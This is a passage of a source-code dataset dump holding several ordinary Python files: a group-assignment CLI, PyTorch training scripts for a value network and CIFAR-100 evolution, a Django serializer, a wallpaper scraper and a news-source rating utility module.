self.name_textbox.setText(random_name())\n","sub_path":"python/ui/createnodedialog.py","file_name":"createnodedialog.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"371751759","text":"import doctest\nimport copy\nimport functools\n\ndef autotest(func):\n    globs = copy.copy(globals())\n    globs.update({func.__name__: func})\n    doctest.run_docstring_examples(\n        func, globs, verbose=True, name=func.__name__)\n    return func\n\n\nimport json\nfrom ast import literal_eval\n\nnom_fichier = 'information_u.json'\n\n\"\"\"divides 16 by the requested group size\"\"\"\n\n\ndef calcul(nb_part):\n    nb_grp = 16 // int(nb_part)\n\n    return nb_grp\n\n\n\"\"\"JSON is used to save the skills and levels\"\"\"\n\"\"\"saves to a json file\"\"\"\n\n\ndef sav_com(item, lvl, comp):\n    with open(nom_fichier, 'w') as fichier:\n        json.dump(str({'nom': item, 'Niveau': lvl, 'compétence': comp}), fichier)\n\n\n\"\"\"reads the json file\"\"\"\n\n\ndef read_com():\n    with open(nom_fichier, 'r') as fichier:\n        information_user = json.load(fichier)\n    return information_user\n\n\n\"\"\"hooks the read and save helpers into the skill handling\"\"\"\n\n\ndef comp(lvl, comp):\n    comp = \"\"\n    lvl = \"\"\n    comp = input(\"\\033[32m The skill:\\033[0m\").lower()\n    for item in participant:\n        lvl = input(\"\\033[32m What is the level of \" + item + \":\\033[0m\").lower()\n        sav_com(item, lvl, comp)\n        information_utilisateur = literal_eval(read_com())\n        for (key, valeur) in information_utilisateur.items():\n            print(f\"{key} is at {valeur}\")\n\n\n\"\"\"randomly assigns participants to groups and removes each chosen participant from the list\"\"\"\n\n\ndef create_grp():\n    for i in y:\n        groupe = []\n        for i in x:\n            used = random.choice(participant)\n            groupe.append(used)\n            participant.remove(used)\n\n        list_grp.append(groupe)\n\n    if len(participant) < int(nb_part):\n        groupe = []\n        for item in participant:\n            groupe = list_grp[-1]\n            groupe.append(item)\n            participant.remove(item)\n\n    print(\"\\033[31mHere are the groups {0}\\033[0m\".format(list_grp))\n\n    \"\"\"doctest helper used to test part of the code\"\"\"\n\n@autotest\ndef calcul(nb_part):\n    \"\"\"NB only INT\n\n    >>> calcul(4)\n    4\n\n    \"\"\"\n    return 16 // int(nb_part)\n\n    \"\"\"forces the request to be an integer and limits group sizes to between 1 and 8 participants\"\"\"\n\n\ndef check_nb_part():\n    nb = \"0\"\n    while int(nb) > 8 or int(nb) == 0:\n        try:\n            nb = int(input(\"\\033[32mPlease enter the number of people per group, between 1 and 8: \\033[0m\"))\n        except ValueError:\n            print(\"You did not enter a number between 1 and 8\")\n\n    nb_part = nb\n\n    return nb_part\n\nimport random\n\nprint(\"\\033[32m\\n----------------------------------------\\n\\033[0m\")\nprint('\\033[32mWelcome to your application.\\033[0m')\nprint(\"\\033[32m\\n----------------------------------------\\n\\033[0m\")\n\n\"\"\"main loop that asks the user what to do and calls the helpers according to the answers\"\"\"\nchoix = \"\"\nwhile choix != \"q\":\n    choix = input(\"\\033[33m\\n(s) To create groups.\\n(q) To quit.\\nYour choice:\\033[0m\").lower()\n    if choix == \"s\":\n        participant = [\"Farid\", \"Marie\", \"Phichet\", \"Arthur\", \"Antoine\", \"Hatice\", \"Giovanni\", \"Mickael\",\n                       \"Rachid\", \"Julien\", \"Vivien\", \"Kevin\", \"Josephine\", \"Valentin\", \"Camille\", \"Tanguy\"]\n        nb_part = check_nb_part()\n        nb_grp = calcul(nb_part)\n        x = range(int(nb_part))\n        y = range(int(nb_grp))\n        list_grp = []\n\n        A = \"\"\n        lvl = \"\"\n        while A != \"y\" and A != \"n\":\n            A = input(\"\\033[32m Would you like to form groups by skill? (y/n): \\033[0m\").lower()\n        if A == \"n\":\n            create_grp()\n        if A == \"y\":\n            comp(lvl, comp)\n\n    if choix == \"q\":\n        print(\"See you soon.\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"147451158","text":"import torch\nimport numpy as np\n\n\nclass ValueNetwork(torch.nn.Module):\n\n    def __init__(self, alpha, input_size, output_size):\n\n        super(ValueNetwork, self).__init__()\n\n        self.input_size = input_size\n        self.output_size = output_size\n\n        self.fc1 = torch.nn.Linear(input_size, 128)\n        self.fc2 = torch.nn.Linear(128, 128)\n        self.fc3 = torch.nn.Linear(128, output_size)\n        self.tanh = torch.nn.Tanh()\n        self.relu = torch.nn.LeakyReLU()\n\n        self.optimizer = torch.optim.Adam(lr=alpha, params=self.parameters())\n        self.loss = torch.nn.MSELoss()\n\n        self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu:0')\n        self.to(self.device)\n\n    def forward(self, x):\n        x = torch.Tensor(x).to(self.device)\n        out = self.fc1(x)\n        out = self.tanh(out)\n        out = self.fc2(out)\n        out = self.tanh(out)\n        out = self.fc3(out)\n        out = self.relu(out)\n        out = out.to(torch.device('cpu:0'))\n        return out\n\n    def optimize(self, observations, rewards, iter=1):  # default was the builtin iter, which range() cannot accept\n\n        for i in range(iter):\n\n            self.optimizer.zero_grad()\n            predictions = self.forward(observations)\n            loss = self.loss(predictions, rewards)\n            loss.backward(retain_graph=True)\n            self.optimizer.step()\n","sub_path":"Trust-Region-Policy-Optimization/trpo/value_network.py","file_name":"value_network.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"483863230","text":"'''Train CIFAR100 with PyTorch.'''\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\n\nimport torchvision\nimport torchvision.transforms as transforms\n\nimport os\nimport argparse\n\nfrom models import depth_dynamic\nfrom NEAT import connection_gene\n#from utils import progress_bar\nfrom torch.autograd import Variable\nimport numpy as np\nimport pandas as pd\nimport time\n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR100 Training')\nparser.add_argument('--lr', default=0.1, type=float, help='learning rate')\nparser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\nparser.add_argument('--mname',default='modulev5wc10c', type=str, help='model name for save')\nargs = parser.parse_args()\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nbest_acc = 0  # best test accuracy\nstart_epoch = 0  # start from epoch 0 or last checkpoint epoch\n\n# Data\nprint('==> Preparing data..')\ntransform_train = transforms.Compose([\n    transforms.RandomCrop(32, padding=4),\n    transforms.RandomHorizontalFlip(),\n    transforms.ToTensor(),\n    transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n])\n\ntransform_test = transforms.Compose([\n    transforms.ToTensor(),\n    transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n])\n\ntrainset = torchvision.datasets.CIFAR100(root='./data', train=True, download=True, transform=transform_train)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=78, shuffle=True, num_workers=2)\n\ntestset = torchvision.datasets.CIFAR100(root='./data', train=False, download=True, transform=transform_test)\ntestloader = 
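The main.py record above builds its groups by mutating module-level state (participant, x, y, list_grp). A self-contained sketch of the same partitioning logic; make_groups is a hypothetical helper written for illustration, not anything in the file:

import random

def make_groups(names, group_size):
    """Shuffle and split; a remainder smaller than group_size joins the last group."""
    pool = list(names)          # don't mutate the caller's list
    random.shuffle(pool)
    groups = [pool[i:i + group_size] for i in range(0, len(pool), group_size)]
    if len(groups) > 1 and len(groups[-1]) < group_size:
        groups[-2].extend(groups.pop())   # merge the leftover people, as main.py does
    return groups

print(make_groups(["Farid", "Marie", "Phichet", "Arthur", "Antoine"], 2))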
torch.utils.data.DataLoader(testset, batch_size=10, shuffle=False, num_workers=2)\n\nclasses = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\n# Model\nprint('==> Building model..')\n\nnet = depth_dynamic.modulenet_cifar()\nnet = net.to(device)\n\ngraph_matrix=[[[0],[1],[2]],[[0],[1],[2]],[[0],[1],[2]]]\n\n\"\"\"\nif device == 'cuda':\n net = torch.nn.DataParallel(net)\n cudnn.benchmark = True\n\"\"\"\nif args.resume:\n # Load checkpoint.\n print('==> Resuming from checkpoint..')\n assert os.path.isdir('./train/'+args.mname+'/checkpoints'), 'Error: no checkpoint directory found!'\n checkpoint = torch.load('./train/'+args.mname+'/checkpoints/best_check.plk')\n net.load_state_dict(checkpoint['net'])\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch']\n graph_matrix = checkpoint['graph']\n print(best_acc)\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)\n\n\ntrainpd = pd.DataFrame({\"epoch\":\"\",\"accuracy\":\"\",\"loss\":\"\"},index=[\"0\"])\n\nsavepath='./train/'+str(args.mname)+'/checkpoints/'\n\nif not os.path.exists(savepath):\n os.makedirs(savepath)\n\n# Training\ndef train(epoch,graph,graph1,graph2,connection):\n print('\\nEpoch: %d' % epoch)\n net.train()\n train_loss = 0\n correct = 0\n total = 0\n start_time=time.time()\n for batch_idx, (inputs, targets) in enumerate(trainloader):\n inputs, targets = inputs.to(device), targets.to(device)\n optimizer.zero_grad()\n outputs = net(inputs,graph,graph1,graph2)\n loss = criterion(outputs, targets)\n loss.backward()\n optimizer.step()\n\n train_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n accuracy=100.*correct/total\n# progress_bar(batch_idx, len(trainloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n# % (train_loss/(batch_idx+1), accuracy, correct, total))\n end_time=time.time()\n epoch_time=end_time-start_time\n data=[epoch,accuracy,train_loss/(batch_idx+1),epoch_time]\n print('trainloss:{},accuracy:{},time_used:{},graphinfo:{}'.format(train_loss/(batch_idx+1),accuracy,epoch_time,graph))\n state = {\n 'net': net.state_dict(),\n 'acc': accuracy,\n 'epoch': epoch,\n 'graph': graph,\n 'connection': connection\n }\n if epoch % 30 == 0:\n savepath='./train/'+str(args.mname)+'/checkpoints/'+str(epoch)+'_check.plk'\n print('system_saving...at {} epoch'.format(epoch))\n torch.save(state, savepath)\n\n return data\n # new = pd.DataFrame({\"epoch\":epoch,\"accuracy\":accuracy,\"loss\":train_loss/(batch_idx+1)},index=[\"0\"])\n # trainpd = trainpd.append(new,newignore_index=True)\n \n\ndef test(epoch,graph,graph1,graph2,connection):\n global best_acc\n net.eval()\n test_loss = 0\n correct = 0\n total = 0\n start_time=time.time()\n for batch_idx, (inputs, targets) in enumerate(testloader):\n inputs, targets = inputs.to(device), targets.to(device)\n outputs = net(inputs,graph,graph1,graph2)\n loss = criterion(outputs, targets)\n\n test_loss += loss.item()\n _, predicted = outputs.max(1)\n total += targets.size(0)\n correct += predicted.eq(targets).sum().item()\n accuracy=100.*correct/total\n\n end_time=time.time()\n epoch_time=end_time-start_time \n# progress_bar(batch_idx, len(testloader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'\n# % (test_loss/(batch_idx+1), 100.*correct/total, correct, total))\n\n data=[epoch,accuracy,test_loss/(batch_idx+1),epoch_time]\n 
print('testloss:{},accuracy:{},time_used:{}'.format(test_loss/(batch_idx+1),accuracy,epoch_time))\n    # Save checkpoint.\n    acc = 100.*correct/total\n    if acc > best_acc:\n        print('Saving..best_record')\n        state = {\n            'net': net.state_dict(),\n            'acc': acc,\n            'epoch': epoch,\n            'graph': graph,\n            'connections': connection\n        }\n        if not os.path.isdir('checkpoint'):\n            os.mkdir('checkpoint')\n        savepath='../outputs/'+str(args.mname)+'best_check.plk'\n        torch.save(state, savepath)\n        best_acc = acc\n    return data\n\nnums=[]\nsparses=[]\n\nsparsity_book=[]\n\ndef extract(m):\n    global sparses\n    global nums\n    if isinstance(m, nn.Conv2d) or isinstance(m, nn.Linear):\n        nums.append(torch.numel(m.weight.data))\n        cc=m.weight.clone().cpu()\n        sparses.append(torch.mean(cc.abs()).detach().numpy())\n        #print(m.weight.data)\n\na=[1,2,3,4]\ntrainnp=np.array(a)\ntestnp=np.array(a)\n\"\"\"\nfor epoch in range(start_epoch, start_epoch+1):\n    nd=train(epoch, graph_matrix)\n    trainnp=np.vstack((trainnp,np.array(nd)))\n    ed=test(epoch, graph_matrix)\n    testnp=np.vstack((testnp,np.array(ed)))\n    net.apply(extract)\n    sparsity_book.append(sparses)\n    sparses=[]\n    nums=[]\n\n\nsavepath='./train/'+str(args.mname)+'train01.csv'\ntrain_data=pd.DataFrame(trainnp,columns=['epoch','accuracy','loss','epoch_time'])\ntrain_data.to_csv(savepath)\nsavepath='./train/'+str(args.mname)+'test01.csv'\ntest_data=pd.DataFrame(testnp,columns=['epoch','accuracy','loss','epoch_time'])\ntest_data.to_csv(savepath)\n\nprint('\\n\\nstarting training with evolution')\n\"\"\"\n#learning rate change\nargs.lr=0.1\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)\n\np1 = connection_gene.population()\np2 = connection_gene.population()\np1.create_radom()\np2.create_radom()\n\n#def population(graph1, graph2):\n\ndef saving(graph, ac, epoch, connection, p= 'p1'):\n    print('Saving..{}compare_record'.format(graph))\n    state = {'net': net.state_dict(),'acc': ac,'epoch': epoch,'graph': graph, 'connections': connection}\n    savepath='../outputs/'+str(p)+'compare_check.plk'\n    torch.save(state, savepath)\n\ndef loading(p = 'p1'):\n    savepath='../outputs/'+str(p)+'compare_check.plk'\n    checkpoint = torch.load(savepath)\n    net.load_state_dict(checkpoint['net'])\n\ndef backup(graph,ac, epoch, connection, p= 'init'): \n    print('Saving..{}compare_record'.format(graph))\n    state = {'net': net.state_dict(),'acc': ac,'epoch': epoch,'graph': graph,'connections': connection}\n    savepath='../outputs/'+str(p)+'compare_check.plk'\n    torch.save(state, savepath)\n\nbest_graph=[]\nbest_connections =[]\n\nfor epoch in range(start_epoch, start_epoch+90):\n    best_graph = p1.graph_matrix\n    print('\\ntraining individual 1')\n    backup(best_graph, best_acc,epoch,p1.connections, p='init')\n    nd=train(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n    ed=test(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n    ac_p1 = ed[1]\n    saving(p1.graph_matrix,ac_p1,epoch,p1.connections,p='p1')\n    print('accuracy is {}'.format(ac_p1))\n    \n    print('\\ntraining individual 2')\n    print('rolling back....')\n    loading(p = 'init')\n    nd1=train(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n    ed1=test(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n    ac_p2 = ed1[1]\n    saving(p2.graph_matrix,ac_p2,epoch,p2.connections,p='p2')\n    print('accuracy is {}'.format(ac_p2))\n    if ac_p1 > ac_p2:\n        p2.connections,p2.graph_matrix,p2.graph2,p2.graph3 = p2.generate(p1.connections)\n        loading(p ='p1')\n        trainnp=np.vstack((trainnp,np.array(nd)))\n        testnp=np.vstack((testnp,np.array(ed)))\n        best_graph = p1.graph_matrix\n        best_connections = p1.connections\n        print(\"choosing individual p1, with graph info:{}, connection info:{}\".format(p1.graph_matrix, p1.connections))\n    else:\n        p1.connections,p1.graph_matrix,p1.graph2,p1.graph3 = p1.generate(p2.connections)\n        trainnp=np.vstack((trainnp,np.array(nd1)))\n        testnp=np.vstack((testnp,np.array(ed1)))\n        best_graph = p2.graph_matrix\n        best_connections = p2.connections\n        print(\"choosing individual p2, with graph info:{}, connection info:{}\".format(p2.graph_matrix, p2.connections))\n    net.apply(extract)\n    sparsity_book.append(sparses)\n    sparses=[]\n    nums=[]\n\nsavepath='../outputs/'+str(args.mname)+'train01.csv'\ntrain_data=pd.DataFrame(trainnp,columns=['epoch','accuracy','loss','epoch_time'])\ntrain_data.to_csv(savepath)\nsavepath='../outputs/'+str(args.mname)+'test01.csv'\ntest_data=pd.DataFrame(testnp,columns=['epoch','accuracy','loss','epoch_time'])\ntest_data.to_csv(savepath)\n\nprint('\\n\\nadjust learning rate to 0.01')\n#learning rate change\nargs.lr=0.01\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)\n\nfor epoch in range(90+start_epoch, 90+start_epoch+50):\n    best_graph = p1.graph_matrix\n    print('\\ntraining individual 1')\n    backup(best_graph, best_acc,epoch,p1.connections, p='init')\n    nd=train(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n    ed=test(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n    ac_p1 = ed[1]\n    saving(p1.graph_matrix,ac_p1,epoch,p1.connections,p='p1')\n    print('accuracy is {}'.format(ac_p1))\n    \n    print('\\ntraining individual 2')\n    print('rolling back....')\n    loading(p = 'init')\n    nd1=train(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n    ed1=test(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n    ac_p2 = ed1[1]\n    saving(p2.graph_matrix,ac_p2,epoch,p2.connections,p='p2')\n    print('accuracy is {}'.format(ac_p2))\n    if ac_p1 > ac_p2:\n        p2.connections,p2.graph_matrix,p2.graph2,p2.graph3 = p2.generate(p1.connections)\n        loading(p ='p1')\n        trainnp=np.vstack((trainnp,np.array(nd)))\n        testnp=np.vstack((testnp,np.array(ed)))\n        best_graph = p1.graph_matrix\n        best_connections = p1.connections\n        print(\"choosing individual p1, with graph info:{}, connection info:{}\".format(p1.graph_matrix, p1.connections))\n    else:\n        p1.connections,p1.graph_matrix,p1.graph2,p1.graph3 = p1.generate(p2.connections)\n        trainnp=np.vstack((trainnp,np.array(nd1)))\n        testnp=np.vstack((testnp,np.array(ed1)))\n        best_graph = p2.graph_matrix\n        best_connections = p2.connections\n        print(\"choosing individual p2, with graph info:{}, connection info:{}\".format(p2.graph_matrix, p2.connections))\n    net.apply(extract)\n    sparsity_book.append(sparses)\n    sparses=[]\n    nums=[]\n\nsavepath='../outputs/'+str(args.mname)+'train01.csv'\ntrain_data=pd.DataFrame(trainnp,columns=['epoch','accuracy','loss','epoch_time'])\ntrain_data.to_csv(savepath)\nsavepath='../outputs/'+str(args.mname)+'test01.csv'\ntest_data=pd.DataFrame(testnp,columns=['epoch','accuracy','loss','epoch_time'])\ntest_data.to_csv(savepath)\n\nprint('\\n\\nadjust learning rate to 0.001')\n#learning rate change\nargs.lr=0.001\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)\n\n\nfor epoch in range(140+start_epoch, 140+start_epoch+30):\n    best_graph = p1.graph_matrix\n    print('\\ntraining individual 1')\n    backup(best_graph, best_acc,epoch,p1.connections, p='init')\n    nd=train(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n    ed=test(epoch,p1.graph_matrix,p1.graph2,p1.graph3,p1.connections)\n    ac_p1 = ed[1]\n    saving(p1.graph_matrix,ac_p1,epoch,p1.connections,p='p1')\n    print('accuracy is {}'.format(ac_p1))\n    \n    print('\\ntraining individual 2')\n    print('rolling back....')\n    loading(p = 'init')\n    nd1=train(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n    ed1=test(epoch,p2.graph_matrix,p2.graph2,p2.graph3,p2.connections)\n    ac_p2 = ed1[1]\n    saving(p2.graph_matrix,ac_p2,epoch,p2.connections,p='p2')\n    print('accuracy is {}'.format(ac_p2))\n    if ac_p1 > ac_p2:\n        p2.connections,p2.graph_matrix,p2.graph2,p2.graph3 = p2.generate(p1.connections)\n        loading(p ='p1')\n        trainnp=np.vstack((trainnp,np.array(nd)))\n        testnp=np.vstack((testnp,np.array(ed)))\n        best_graph = p1.graph_matrix\n        best_connections = p1.connections\n        print(\"choosing individual p1, with graph info:{}, connection info:{}\".format(p1.graph_matrix, p1.connections))\n    else:\n        p1.connections,p1.graph_matrix,p1.graph2,p1.graph3 = p1.generate(p2.connections)\n        trainnp=np.vstack((trainnp,np.array(nd1)))\n        testnp=np.vstack((testnp,np.array(ed1)))\n        best_graph = p2.graph_matrix\n        best_connections = p2.connections\n        print(\"choosing individual p2, with graph info:{}, connection info:{}\".format(p2.graph_matrix, p2.connections))\n    net.apply(extract)\n    sparsity_book.append(sparses)\n    sparses=[]\n    nums=[]\n\nsavepath='../outputs/'+str(args.mname)+'train01.csv'\ntrain_data=pd.DataFrame(trainnp,columns=['epoch','accuracy','loss','epoch_time'])\ntrain_data.to_csv(savepath)\nsavepath='../outputs/'+str(args.mname)+'test01.csv'\ntest_data=pd.DataFrame(testnp,columns=['epoch','accuracy','loss','epoch_time'])\ntest_data.to_csv(savepath)\n\n\nnet.apply(extract)\n\nprint('param nums:',nums)\nprint('best accuracy is :{}'.format(best_acc))\nprint('best connections is {}'.format(best_connections))\n","sub_path":"train_deep_c100.py","file_name":"train_deep_c100.py","file_ext":"py","file_size_in_byte":14854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"332364894","text":"from rest_framework import serializers\nfrom boiler_datacollection.models import BoilerDatacollection\nfrom django.contrib.auth.models import User\n\nclass BoilerDatacollectionSerializer(serializers.HyperlinkedModelSerializer):\n    owner = serializers.ReadOnlyField(source='owner.username')\n    start_date = serializers.ReadOnlyField()\n    id = serializers.ReadOnlyField()\n\n    class Meta:\n        model = BoilerDatacollection\n        fields = ('id', 'url', 'client', 'start_date', 'owner', 'notes',\n                  'name', 'boiler_capacity_mbh', 'hours_of_operation',\n                  'separately_meter', 'make_up_water_log_separate_bill',\n                  'no_of_steam_traps', 'steam_trap_audit_performed',\n                  'is_the_header_insulated', 'aerator_tank_pressure',\n                  'percentage_condensate_that_returns_to_boiler',\n                  'production_pressure', 'aerator_tank_temp')\n","sub_path":"boiler_datacollection/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"346429578","text":"import requests\nfrom bs4 import BeautifulSoup\nimport subprocess\nfrom os import path, system\n\n\ndef run(dir_wallpappers):\n    wallpapers_dir = dir_wallpappers\n    command_terminal_get_screen_size = \"xdpyinfo | awk '/dimensions/{print $2}'\"\n    screen_size = subprocess.check_output(\n        command_terminal_get_screen_size, shell=True).decode(\"utf-8\").split('x')\n    
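train_deep_c100.py above repeats the same tournament loop three times, once per learning-rate stage. A hedged sketch of that pattern factored into one helper; train_fn, eval_fn, backup_fn and load_fn stand in for the script's train, test, backup and loading, and the individuals are assumed to expose connections, graph_matrix, graph2, graph3 and generate() as in the snippet:

def tournament_epoch(epoch, p1, p2, train_fn, eval_fn, backup_fn, load_fn):
    """Train both individuals from the same weights and keep the better one."""
    backup_fn(p1.graph_matrix, epoch)                 # snapshot the shared weights
    train_fn(epoch, p1.graph_matrix, p1.graph2, p1.graph3, p1.connections)
    acc1 = eval_fn(epoch, p1.graph_matrix, p1.graph2, p1.graph3, p1.connections)[1]

    load_fn()                                         # roll the weights back for p2
    train_fn(epoch, p2.graph_matrix, p2.graph2, p2.graph3, p2.connections)
    acc2 = eval_fn(epoch, p2.graph_matrix, p2.graph2, p2.graph3, p2.connections)[1]

    winner, loser = (p1, p2) if acc1 > acc2 else (p2, p1)
    # the loser is regenerated (mutated) from the winner's connection genes;
    # the original script also reloads the winner's checkpoint when p1 wins
    loser.connections, loser.graph_matrix, loser.graph2, loser.graph3 = \
        loser.generate(winner.connections)
    return winner

With a helper like this, each learning-rate stage in the script would collapse to a plain for-loop over epochs calling tournament_epoch once per epoch.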
screen_width = int(screen_size[0])\n screen_height = int(screen_size[1])\n\n # url = 'https://www.pexels.com/search/landscape/'\n url = 'https://www.pexels.com'\n response = requests.get(url)\n soup = BeautifulSoup(response.content, 'html.parser')\n image_container = soup.find_all(\n 'article', {\n 'class': 'photo-item',\n })\n\n image_pool = []\n image_selected = {\n 'author': '',\n 'title': '',\n 'size': '',\n 'url': ''\n }\n\n for image in image_container:\n try:\n image_size = image['data-photo-modal-download-value-original'].\\\n split('x')\n image_url = image['data-photo-modal-image-grid-item-srcset']\\\n .split('?')[0]\n image_width = int(image_size[0])\n image_height = int(image_size[1])\n\n if image_width == screen_width and image_height == screen_height:\n image_selected['author'] = image['data-photo-modal-user-profile-full-name']\n image_selected['title'] = image['data-meta-title']\n image_selected['size'] = image['data-photo-modal-download-value-original']\n image_selected['url'] = image_url\n\n elif image_width >= screen_width\\\n and image_height >= screen_height\\\n and image_width > image_height:\n\n image_pool.append((image_width, image_height, image))\n\n except KeyError:\n pass\n\n if not image_selected['url']:\n image_pool.sort(key=lambda x: x[0])\n image_selected['author'] = image_pool[0][2]['data-photo-modal-user-profile-full-name']\n image_selected['title'] = image_pool[0][2]['data-meta-title']\n image_selected['size'] = image_pool[0][2]['data-photo-modal-download-value-original']\n image_selected['url'] = image_pool[0][2]['data-photo-modal-image-grid-item-srcset']\\\n .split('?')[0]\n\n img_file_name = '{}__{}'.format(\n image_selected['title'], image_selected['author'])\n\n img_file_name = img_file_name.replace('·', '').replace(' ', '_')\n\n img_full_path = path.join(wallpapers_dir, img_file_name)\n\n with open(img_full_path, 'wb') as img:\n img.write(requests.get(image_selected['url']).content)\n\n system('gsettings set org.gnome.desktop.background picture-uri file://{}'.format(\n img_full_path\n ))\n\n print(img_full_path)\n\n\n'''\n name: data-photo-modal-user-profile-full-name\n profile: data-photo-modal-user-profile-link\n title: data-meta-title\n size: data-photo-modal-download-value-original\n url: data-photo-modal-image-grid-item-src\n '''\n\n# /usr/share/backgrounds/warty-final-ubuntu.png'\n# file:///usr/share/backgrounds/warty-final-ubuntu.png\n\n# print(image_selected['data-photo-modal-download-url'])\n\n\nif __name__ == '__main__':\n run('/home/quattro/Imágenes/wallpapers')\n","sub_path":"setWallpapper.py","file_name":"setWallpapper.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"629815937","text":"\"\"\" Utility functions for jupyter notebooks \"\"\"\n\nimport logging\nimport os\nimport pickle\nimport re\nimport sqlite3\nimport inspect\nimport sys\nimport json\n\nimport pandas as pd\n\nTMP_PATH = None\n\nDATA_RAW_PATH = \"../data/raw/\"\n\nGT_COLS = {\n \"NewsGuard\": [\n \"NewsGuard, Does not repeatedly publish false content\",\n \"NewsGuard, Gathers and presents information responsibly\",\n \"NewsGuard, Regularly corrects or clarifies errors\",\n \"NewsGuard, Handles the difference between news and opinion responsibly\",\n \"NewsGuard, Avoids deceptive headlines\",\n \"NewsGuard, Website discloses ownership and financing\",\n \"NewsGuard, Clearly labels advertising\",\n \"NewsGuard, Reveals who's in charge, including any possible conflicts of 
interest\",\n \"NewsGuard, Provides information about content creators\",\n \"NewsGuard, score\",\n \"NewsGuard, overall_class\",\n ],\n \"Pew Research Center\": [\n \"Pew Research Center, known_by_40%\",\n \"Pew Research Center, total\",\n \"Pew Research Center, consistently_liberal\",\n \"Pew Research Center, mostly_liberal\",\n \"Pew Research Center, mixed\",\n \"Pew Research Center, mostly conservative\",\n \"Pew Research Center, consistently conservative\",\n ],\n \"Wikipedia\": [\"Wikipedia, is_fake\"],\n \"Open Sources\": [\n \"Open Sources, reliable\",\n \"Open Sources, fake\",\n \"Open Sources, unreliable\",\n \"Open Sources, bias\",\n \"Open Sources, conspiracy\",\n \"Open Sources, hate\",\n \"Open Sources, junksci\",\n \"Open Sources, rumor\",\n \"Open Sources, blog\",\n \"Open Sources, clickbait\",\n \"Open Sources, political\",\n \"Open Sources, satire\",\n \"Open Sources, state\",\n ],\n \"Media Bias / Fact Check\": [\n \"Media Bias / Fact Check, label\",\n \"Media Bias / Fact Check, factual_reporting\",\n \"Media Bias / Fact Check, extreme_left\",\n \"Media Bias / Fact Check, right\",\n \"Media Bias / Fact Check, extreme_right\",\n \"Media Bias / Fact Check, propaganda\",\n \"Media Bias / Fact Check, fake_news\",\n \"Media Bias / Fact Check, some_fake_news\",\n \"Media Bias / Fact Check, failed_fact_checks\",\n \"Media Bias / Fact Check, conspiracy\",\n \"Media Bias / Fact Check, pseudoscience\",\n \"Media Bias / Fact Check, hate_group\",\n \"Media Bias / Fact Check, anti_islam\",\n \"Media Bias / Fact Check, nationalism\",\n ],\n \"Allsides\": [\n \"Allsides, bias_rating\",\n \"Allsides, community_agree\",\n \"Allsides, community_disagree\",\n \"Allsides, community_label\",\n ],\n \"BuzzFeed\": [\"BuzzFeed, leaning\"],\n \"Politifact\": [\n \"PolitiFact, Pants on Fire!\",\n \"PolitiFact, False\",\n \"PolitiFact, Mostly False\",\n \"PolitiFact, Half-True\",\n \"PolitiFact, Mostly True\",\n \"PolitiFact, True\",\n ],\n}\n\n# The dictionary of source names that are actually the same, but differ textually between MBC and NELA\nMBC_to_NELA = {\n \"New York Times\": \"The New York Times\",\n \"Wall Street Journal\": \"WSJ Washington Wire\",\n \"ABC\": \"ABC News\",\n \"Washington Examiner\": \"The Washington Examiner\",\n \"The Blaze\": \"TheBlaze\",\n \"BuzzFeed\": \"Buzzfeed\",\n \"Mother Jones\": \"MotherJones\",\n \"National Public Radio\": \"NPR\",\n \"The New Yorker\": \"New Yorker\",\n \"Huffington Post\": \"The Huffington Post\",\n \"Intercept\": \"The Intercept\",\n \"Daily Caller\": \"The Daily Caller\",\n \"Fiscal Times\": \"The Fiscal Times\",\n \"ShareBlue\": \"Shareblue\",\n \"InfoWars\": \"Infowars\",\n \"Think Progress\": \"ThinkProgress\",\n \"CBS\": \"CBS News\"\n}\n\n\ndef 